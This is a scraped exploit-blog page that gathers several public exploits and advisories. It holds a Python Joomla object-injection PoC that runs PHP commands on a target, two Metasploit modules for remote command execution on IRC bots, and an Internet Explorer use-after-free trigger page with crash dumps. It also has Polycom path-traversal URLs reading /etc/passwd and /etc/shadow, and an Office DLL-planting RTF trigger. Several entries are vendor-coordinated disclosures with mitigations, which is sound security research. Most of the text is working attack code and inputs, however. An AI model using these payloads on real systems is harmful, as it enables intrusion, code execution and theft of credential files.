'''
Simple PoC for Joomla Object Injection.
Gary @ Sec-1 ltd
http://www.sec-1.com/
'''
import requests # easy_install requests
def get_url(url, user_agent):
headers = {
'User-Agent': user_agent
}
cookies = requests.get(url,headers=headers).cookies
for _ in range(3):
response = requests.get(url, headers=headers,cookies=cookies)
return response
def php_str_noquotes(data):
"Convert string to chr(xx).chr(xx) for use in php"
encoded = ""
for char in data:
encoded += "chr({0}).".format(ord(char))
return encoded[:-1]
def generate_payload(php_payload):
php_payload = "eval({0})".format(php_str_noquotes(php_payload))
terminate = '\xf0\xfd\xfd\xfd';
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
return exploit_template
pl = generate_payload("system('touch /tmp/fx');")
print get_url("http://172.31.6.242/", pl)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863119337
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution',
'Description' => %q{
This module allows remote command execution on an IRC Bot developed by xdh.
This perl bot was caught by Conor Patrick with his shellshock honeypot server
and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot). Matt
Thayer also found this script which has a description of LinuxNet perlbot.
The bot answers only based on the servername and nickname in the IRC message
which is configured on the perl script thus you need to be an operator on the IRC
network to spoof it and in order to exploit this bot or have at least the same ip
to the config.
},
'Author' =>
[
#MalwareMustDie
'Jay Turla', # msf
'Conor Patrick', # initial discovery and botnet analysis for xdh
'Matt Thayer' # initial discovery for LinuxNet perlbot
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://conorpp.com/blog/a-close-look-at-an-operating-botnet/' ],
[ 'URL', 'https://twitter.com/MrMookie/status/673389285676965889' ], # Matt's discovery
[ 'URL', 'https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities' ] # details of what an fBot is
],
'Platform' => %w{ unix win },
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Targets' =>
[
[ 'xdh Botnet / LinuxNet perlbot', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'Dec 04 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6667),
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
OptString.new('NICK', [true, 'IRC Nickname', 'msfuser']), # botnet administrator name
OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
], self.class)
end
def check
connect
res = register(sock)
if res =~ /463/ || res =~ /464/
vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return Exploit::CheckCode::Unknown
end
res = join(sock)
if !res =~ /353/ && !res =~ /366/
vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
return Exploit::CheckCode::Unknown
end
quit(sock)
disconnect
if res =~ /auth/ && res =~ /logged in/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def send_msg(sock, data)
sock.put(data)
data = ""
begin
read_data = sock.get_once(-1, 1)
while !read_data.nil?
data << read_data
read_data = sock.get_once(-1, 1)
end
rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
end
data
end
def register(sock)
msg = ""
if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
end
if datastore['NICK'].length > 9
nick = rand_text_alpha(9)
print_error("The nick is longer than 9 characters, using #{nick}")
else
nick = datastore['NICK']
end
msg << "NICK #{nick}\r\n"
msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
send_msg(sock,msg)
end
def join(sock)
join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
send_msg(sock, join_msg)
end
def xdh_command(sock)
encoded = payload.encoded
command_msg = "PRIVMSG #{datastore['CHANNEL']} :.say #{encoded}\r\n"
send_msg(sock, command_msg)
end
def quit(sock)
quit_msg = "QUIT :bye bye\r\n"
sock.put(quit_msg)
end
def exploit
connect
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
res = register(sock)
if res =~ /463/ || res =~ /464/
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return
end
print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
res = join(sock)
if !res =~ /353/ && !res =~ /366/
print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
return
end
print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
xdh_command(sock)
quit(sock)
disconnect
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Legend Perl IRC Bot Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution on the Legend Perl IRC Bot .
This bot has been used as a payload in the Shellshock spam last October 2014.
This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and
UDP flooding, the ability to remove system logs, and ability to gain root, and
VNC scanning.
Kevin Stevens, a Senior Threat Researcher at Damballa has uploaded this script
to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.
},
'Author' =>
[
'Jay Turla' # msf and initial discovery
#MalwareMustDie
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '121681' ],
[ 'EDB', '36836' ],
[ 'URL', 'https://www.damballa.com/perlbotnado/' ],
[ 'URL', 'http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html' ] # Shellshock spam October 2014 details
],
'Platform' => %w{ unix win },
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Targets' =>
[
[ 'Legend IRC Bot', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 27 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6667),
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
], self.class)
end
def check
connect
res = register(sock)
if res =~ /463/ || res =~ /464/
vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return Exploit::CheckCode::Unknown
end
res = join(sock)
if !res =~ /353/ && !res =~ /366/
vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
return Exploit::CheckCode::Unknown
end
quit(sock)
disconnect
if res =~ /auth/ && res =~ /logged in/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def send_msg(sock, data)
sock.put(data)
data = ""
begin
read_data = sock.get_once(-1, 1)
while !read_data.nil?
data << read_data
read_data = sock.get_once(-1, 1)
end
rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
end
data
end
def register(sock)
msg = ""
if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
end
if datastore['NICK'].length > 9
nick = rand_text_alpha(9)
print_error("The nick is longer than 9 characters, using #{nick}")
else
nick = datastore['NICK']
end
msg << "NICK #{nick}\r\n"
msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
send_msg(sock,msg)
end
def join(sock)
join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
send_msg(sock, join_msg)
end
def legend_command(sock)
encoded = payload.encoded
command_msg = "PRIVMSG #{datastore['CHANNEL']} :!legend #{encoded}\r\n"
send_msg(sock, command_msg)
end
def quit(sock)
quit_msg = "QUIT :bye bye\r\n"
sock.put(quit_msg)
end
def exploit
connect
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
res = register(sock)
if res =~ /463/ || res =~ /464/
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return
end
print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
res = join(sock)
if !res =~ /353/ && !res =~ /366/
print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
return
end
print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
legend_command(sock)
quit(sock)
disconnect
end
end
<!--
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/ research(at)bluefrostsecurity.de
BFS-SA-2015-003 10-December-2015
________________________________________________________________________________
Vendor: Microsoft, http://www.microsoft.com
Affected Products: Internet Explorer
Affected Version: IE 11
Vulnerability: MSHTML!CObjectElement Use-After-Free Vulnerability
CVE ID: CVE-2015-6152
________________________________________________________________________________
I. Impact
This vulnerability allows the execution of arbitrary code on vulnerable
installations of Microsoft Internet Explorer. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page or
open a malicious file.
________________________________________________________________________________
II. Vulnerability Details
Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in
the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed
on Internet Explorer 11 running on Windows 7 SP1 (x64).
The following HTML page can be used to reproduce the issue:
-->
<!DOCTYPE HTML>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<style>
small{ -ms-block-progression: lr; -ms-filter: "vv"; }
</style>
<script>
function trigger() { document.execCommand("JustifyLeft"); }
</script>
<nolayer>blue<small>frost</small>
<applet><tt>security</applet>
<script>trigger();</script>
</html>
<!--
With page heap enabled and the Memory Protect feature turned off, visiting
that page results in the following crash:
(2d4.830): Access violation - code c0000005 (!!! second chance !!!)
eax=09b09e90 ebx=125b4e60 ecx=00000000 edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0
eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!CTreeNode::ComputeFormatsHelper+0x53:
6dfcc19b f7402400000300 test dword ptr [eax+24h],30000h ds:002b:09b09eb4=????????
0:007> !heap -p -a @eax
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
9b01f04: 9b09000 2000
748090b2 verifier!AVrfDebugPageHeapFree+0x000000c2
77e61b1c ntdll!RtlDebugFreeHeap+0x0000002f
77e1ae8a ntdll!RtlpFreeHeap+0x0000005d
77dc2b65 ntdll!RtlFreeHeap+0x00000142
758814ad kernel32!HeapFree+0x00000014
6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122
6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x00000023
6dfce0db MSHTML!CElement::PrivateRelease+0x0000027e
6d98953d MSHTML!CObjectElement::DeferredFallback+0x0000033d
6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b
6d95577e MSHTML!GlobalWndProc+0x0000012e
770762fa user32!InternalCallWinProc+0x00000023
77076d3a user32!UserCallWinProcCheckWow+0x00000109
770777c4 user32!DispatchMessageWorker+0x000003bc
7707788a user32!DispatchMessageW+0x0000000f
6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7
76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067
747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
7588336a kernel32!BaseThreadInitThunk+0x0000000e
77dc9882 ntdll!__RtlUserThreadStart+0x00000070
77dc9855 ntdll!_RtlUserThreadStart+0x0000001b
We can see that a freed CObjectElement object is accessed in the
MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the
memory just before the CObjectElement destructor is called, we can see where
the object was initially allocated.
0:007> bu MSHTML!CObjectElement::~CObjectElement
0:007> g
Breakpoint 0 hit
eax=6daf6b10 ebx=00000000 ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324
eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000287
MSHTML!CObjectElement::~CObjectElement:
0:007> !heap -p -a poi(@esp+4)
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
9b01f04: 9b09e90 170 - 9b09000 2000
MSHTML!CObjectElement::`vftable'
74808e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77e6134e ntdll!RtlDebugAllocateHeap+0x00000030
77e1b16e ntdll!RtlpAllocateHeap+0x000000c4
77dc2fe3 ntdll!RtlAllocateHeap+0x0000023a
6daf6a27 MSHTML!CObjectElement::CreateElement+0x00000017
6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x000000b8
6df17172 MSHTML!CHtmParse::ParseToken+0x00000096
6df16a0f MSHTML!CHtmPost::ProcessTokens+0x000004c7
6dd8341b MSHTML!CHtmPost::Exec+0x00000207
6da308a8 MSHTML!CHtmPost::Run+0x0000003d
6da3080e MSHTML!PostManExecute+0x00000061
6da2727c MSHTML!PostManResume+0x0000007b
6da971f0 MSHTML!CDwnChan::OnMethodCall+0x0000002f
6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b
6d95577e MSHTML!GlobalWndProc+0x0000012e
770762fa user32!InternalCallWinProc+0x00000023
77076d3a user32!UserCallWinProcCheckWow+0x00000109
770777c4 user32!DispatchMessageWorker+0x000003bc
7707788a user32!DispatchMessageW+0x0000000f
6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7
76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067
747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
7588336a kernel32!BaseThreadInitThunk+0x0000000e
77dc9882 ntdll!__RtlUserThreadStart+0x00000070
77dc9855 ntdll!_RtlUserThreadStart+0x0000001b
________________________________________________________________________________
III. Mitigation
The issue was fixed in MS15-124 which should be installed to resolve the issue.
________________________________________________________________________________
IV. Disclosure Timeline
- 2015-08-04 Vulnerability reported to secure@microsoft.com
- 2015-09-24 Microsoft confirms that they successufully reproduced the issue
- 2015-12-08 Microsoft resolves issue in MS15-124
________________________________________________________________________________
Credit:
Bug found by Moritz Jodeit of Blue Frost Security GmbH.
________________________________________________________________________________
Unaltered electronic reproduction of this advisory is permitted. For all other
reproduction or publication, in printing or otherwise, contact
research@bluefrostsecurity.de for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded. In no
event shall Blue Frost Security be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages, even if Blue Frost Security has been advised of the
possibility of such damages.
Copyright 2015 Blue Frost Security GmbH. All rights reserved. Terms of use apply.
-->
Polycom VVX-Series Business Media Phones Path Traversal Vulnerability
--Summary--
Polycom VVX-series Business Media Phones allow authenticated users to execute file path traversal attacks
# Polycom
# http://www.polycom.com
--Affects--
# Polycom VVX 101, 201, 300, 310, 400, 410, 500, 600, & 1500
# UC Software 4.1.8 and earlier, 5.2.3 and earlier, 5.3.1 and earlier, 5.4.0 and earlier
--Details--
Polycom VVX-series IP phones provide a web administrative interface. Inside this interface we discovered two URLs that exposed a "file=filename" parameters. Due to unsafe file system operations in this interface, it is possible to exploit the following pages, and possibly others, using path traversal attacks:
http://a.b.c.d/Preferences/Ringtone?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://a.b.c.d/Preferences/Background?file=.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
--Mitigation--
Upgrade to the latest version of UC Software available.
Disable or restrict access to the web interface.
--Timeline--
# 6/16/2015: Notified Polycom about the issue
# 6/17/2015: Polycom responds, indicates it is investigating
# 6/18/2015: Polycom acknowledges vulnerability legitimacy
# 6/26/2015: Polycom waiting on estimate for fix from engineering
# 7/22/2015: Polycom provides with projected timelines for fixes
# 11/24/2015: Polycom confirms all VVX branches are patched
# 12/9/2015: Polycom issues public vulnerability advisory
--References--
https://depthsecurity.com/blog/polycom-vvx-series-business-media-phones-path-traversal-vulnerability
http://supportdocs.polycom.com/PolycomService/support/global/documents/support/documentation/VVX_Path_Traversals_v_1_0.pdf
Jake Reynolds
Partner/Principal Consultant
www.depthsecurity.com
Source: https://code.google.com/p/google-security-research/issues/detail?id=545
There is a type confusion issue during serialization if ObjectEncoder.dynamicPropertyWriter is overridden with a value that is not a function.
In the following ActionScript:
flash.net.ObjectEncoding.dynamicPropertyWriter = new subdpw();
var b = new ByteArray();
var a = {};
a.test = 1;
b.writeObject(a);
The object 'a' with a dynamic property 'test' is serialized using a custom dynamicPropertyWriter of class subpwd. However this class overrides writeDynamicProperties with a property that is not a function leading to type confusion (note that this is not possible in the compiler, the bytecode needs to be modified manually).
To reproduce the issue, load objectencoding.swf. PoC code is also attached. To use this code, compile the swf, and decompress it (for example, using flasm -x), and then search for the string "triteDocumentProperties" in the SWF and change it to "writeDocumentProperties".
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38970.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=548
If IExternalizable.readExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption.
A sample swf is attached. ActionScript code is also attached, but it does not compile to the needed to swf. To get the PoC, decompress the swf using flasm -x myswf, and then search for "teadExternal" and change it to "readExternal".
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38969.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=556
It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. This attack also works on Office 2013 running on Windows 7 x64. Other platforms were not tested. The attached POC document "planted-mqrt.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {ecabafc9-7f19-11d2-978e-0000f8757e2a} (formatted as pack(">IHHBBBBBBBB")). This object has a InProcServer32 pointing to comsvcs.dll. Specifically the CQueueAdmin object implemented in the dll.
When a user opens this document and single clicks on the icon for foo.txt ole32!OleLoad is invoked on our vulnerable CLSID. This results in a call to a class factory constructor that tries eventually tries to call mqrt!MQGetPrivateComputerInformation. Because mqrt is a delay loaded dll the loader has inserted a stub to call _tailMerge_mqrt_dll on the first call of this function. This results in a kernelbase!LoadLibraryExA call vulnerable to dll planting. If the attached mqrt.dll is placed in the same directory with the planted-mqrt.doc file you should see a popup coming from this DLL being loaded from the current working directory of Word.
It's worth noting that there are several other delay loaded dlls in reachable from comsvcs.dll as well. The full list is:
ADVAPI32.dll
API_MS_WIN_Service_Management_L1_1_0.dll
API_MS_WIN_Service_Management_L2_1_0.dll
API_MS_WIN_Service_winsvc_L1_1_0.dll
API_MS_Win_Security_SDDL_L1_1_0.dll
CLBCatQ.DLL
CRYPTSP.dll
MTXCLU.DLL
ODBC32.dll
VERSION.dll
XOLEHLP.dll
colbact.DLL
dbghelp.dll
mqrt.dll
netutils.dll
samcli.dll
Here is the call stack from the delay loaded mqrt.dll:
0:000> kb
ChildEBP RetAddr Args to Child
001b7cb4 76f15d1c 76f30924 00000460 ffffffff ntdll!KiFastSystemCallRet
001b7cb8 76f30924 00000460 ffffffff 001b7da0 ntdll!ZwMapViewOfSection+0xc
001b7d0c 76f3099a 00000460 00000000 00000000 ntdll!LdrpMapViewOfSection+0xc7
001b7da4 76f2fec4 001b7df0 001b7f00 00000000 ntdll!LdrpFindOrMapDll+0x310
001b7f24 76f325ea 001b7f84 001b7f50 00000000 ntdll!LdrpLoadDll+0x2b6
001b7f58 75188c19 003a8aac 001b7f9c 001b7f84 ntdll!LdrLoadDll+0x92
001b7f94 751890ac 00000000 00000000 003a8aac KERNELBASE!LoadLibraryExW+0x1d9
001b7fb4 70dd96c0 70e8de20 00000000 00000000 KERNELBASE!LoadLibraryExA+0x26
001b8000 70e7cb2b 00000000 70e94148 003768a0 comsvcs!__delayLoadHelper2+0x59
001b8054 70e7588e 70ea52ec 5160c47e 8007000e comsvcs!_tailMerge_mqrt_dll+0xd
001b8088 70e75c09 069d8cf8 70dd31ac 5160c442 comsvcs!CMSMQRT::Load+0x3a
001b8090 70dd31ac 5160c442 00000000 001b8114 comsvcs!CQueueAdmin::FinalConstruct+0xa
001b80b4 70dd47ef 00000000 001b9880 069d8cf8 comsvcs!ATL::CComCreator<ATL::CComObject<CQueueAdmin> >::CreateInstance+0x50
001b80c8 70dc7d08 00000000 001b9880 001b8114 comsvcs!ATL::CComCreator2<ATL::CComCreator<ATL::CComObject<CQueueAdmin> >,ATL::CComFailCreator<-2147221232> >::CreateInstance+0x18
001b80e0 765e8c86 06988358 00000000 001b9880 comsvcs!ATL::CComClassFactory::CreateInstance+0x3b
001b8168 76603170 76706444 00000000 001b94e4 ole32!CServerContextActivator::CreateInstance+0x172 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1000]
001b81a8 765e8daa 001b94e4 00000000 00414230 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
001b81fc 767602f1 7670646c 00000000 001b94e4 ole32!CApartmentActivator::CreateInstance+0x112 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 2268]
001b8220 767c6311 765e8d36 001b8410 00000004 RPCRT4!Invoke+0x2a
001b8628 766fd7e6 06a70490 0678a6e8 067982b8 RPCRT4!NdrStubCall2+0x2d6
001b8670 766fd876 06a70490 067982b8 0678a6e8 ole32!CStdStubBuffer_Invoke+0xb6 [d:\w7rtm\com\rpc\ndrole\stub.cxx @ 1590]
001b86b8 766fddd0 067982b8 003a877c 00000000 ole32!SyncStubInvoke+0x3c [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1187]
001b8704 76618a43 067982b8 06979020 06a70490 ole32!StubInvoke+0xb9 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1396]
001b87e0 76618938 0678a6e8 00000000 06a70490 ole32!CCtxComChnl::ContextInvoke+0xfa [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 1262]
001b87fc 766fa44c 067982b8 00000001 06a70490 ole32!MTAInvoke+0x1a [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 2105]
001b882c 766fdb41 d0908070 0678a6e8 06a70490 ole32!AppInvoke+0xab [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1086]
001b890c 766fe1fd 06798260 003d6098 00000000 ole32!ComInvokeWithLockAndIPID+0x372 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1724]
001b8934 76619367 06798260 00000000 06798260 ole32!ComInvoke+0xc5 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1469]
001b8948 766fe356 06798260 06798260 0039d408 ole32!ThreadDispatch+0x23 [d:\w7rtm\com\ole32\com\dcomrem\chancont.cxx @ 298]
001b895c 766fe318 06798260 001b8a64 00000000 ole32!DispatchCall+0x27 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4273]
001b8988 766fcef0 001b8a50 001b8b78 0697fd00 ole32!CRpcChannelBuffer::SwitchAptAndDispatchCall+0xa1 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4321]
001b8a68 765f9d01 0697fd00 001b8b78 001b8b60 ole32!CRpcChannelBuffer::SendReceive2+0xef [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4076]
001b8ae4 765f9b24 0697fd00 001b8b78 001b8b60 ole32!CAptRpcChnl::SendReceive+0xaf [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 603]
001b8b38 766fce06 0697fd00 001b8b78 001b8b60 ole32!CCtxComChnl::SendReceive+0x1c5 [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 734]
001b8b54 7675476e 06a39d34 001b8ba4 767c6753 ole32!NdrExtpProxySendReceive+0x49 [d:\w7rtm\com\rpc\ndrole\proxy.cxx @ 1932]
001b8b60 767c6753 7a61ad54 001b8fb0 0700022b RPCRT4!NdrpProxySendReceive+0xe
001b8f78 766fc8e2 7660fa10 7661484a 001b8fb0 RPCRT4!NdrClientCall2+0x1a6
001b8f98 765f98ad 00000014 00000004 001b8fc8 ole32!ObjectStublessClient+0xa2 [d:\w7rtm\com\rpc\ndrole\i386\stblsclt.cxx @ 474]
001b8fa8 765e8d1f 06a39d34 00000000 001b94e4 ole32!ObjectStubless+0xf [d:\w7rtm\com\rpc\ndrole\i386\stubless.asm @ 154]
001b8fc8 765e8aa2 76706494 00000001 00000000 ole32!CProcessActivator::CCICallback+0x6d [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1737]
001b8fe8 765e8a53 76706494 001b9340 00000000 ole32!CProcessActivator::AttemptActivation+0x2c [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1630]
001b9024 765e8e0d 76706494 001b9340 00000000 ole32!CProcessActivator::ActivateByContext+0x4f [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1487]
001b904c 76603170 76706494 00000000 001b94e4 ole32!CProcessActivator::CreateInstance+0x49 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1377]
001b908c 76602ef4 001b94e4 00000000 001b9a50 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
001b92ec 76603170 76706448 00000000 001b94e4 ole32!CClientContextActivator::CreateInstance+0xb0 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 685]
001b932c 76603098 001b94e4 00000000 001b9a50 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
001b9b04 76609e25 001b9c20 00000000 00000403 ole32!ICoCreateInstanceEx+0x404 [d:\w7rtm\com\ole32\com\objact\objact.cxx @ 1334]
001b9b64 76609d86 001b9c20 00000000 00000403 ole32!CComActivator::DoCreateInstance+0xd9 [d:\w7rtm\com\ole32\com\objact\immact.hxx @ 343]
001b9b88 76609d3f 001b9c20 00000000 00000403 ole32!CoCreateInstanceEx+0x38 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 157]
001b9bb8 7662154c 001b9c20 00000000 00000403 ole32!CoCreateInstance+0x37 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 110]
001b9c34 7661f2af ecabafc9 11d27f19 00008e97 ole32!wCreateObject+0x106 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 3046]
001b9c98 7661f1d4 053d0820 00000000 605c63a8 ole32!OleLoadWithoutBinding+0x9c [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1576]
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\office14\mso.dll -
001b9cc0 5eb283bf 053d0820 605c63a8 02397a00 ole32!OleLoad+0x37 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1495]
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Microsoft Office\Office14\wwlib.dll -
WARNING: Stack unwind information not available. Following frames may be wrong.
001b9d34 60a53973 053d0820 605c63a8 02397a00 mso!Ordinal2023+0x7c
001b9d80 60a53881 036dc800 053d0820 605c63a8 wwlib!DllGetLCID+0x46e24d
It is also possible to trigger this DLL load without requiring a user click by using the following RTF document:
{\rtf1{\object\objemb{\*\objclass None}{\*\oleclsid \'7becabafc9-7f19-11d2-978e-0000f8757e2a\'7d}{\*\objdata 010500000100000001000000000000000000000000000000000000000000000000000000000000000000000000}}}
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38968.zip
# Exploit Title: Admin Management Xtended 2.4.0 Privilege escalation
# Date: 14-12-2015
# Software Link: https://wordpress.org/plugins/admin-management-xtended/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
